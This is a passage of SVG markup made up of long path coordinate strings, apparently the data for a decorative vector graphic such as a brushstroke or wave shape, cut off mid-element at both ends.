8,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n <path 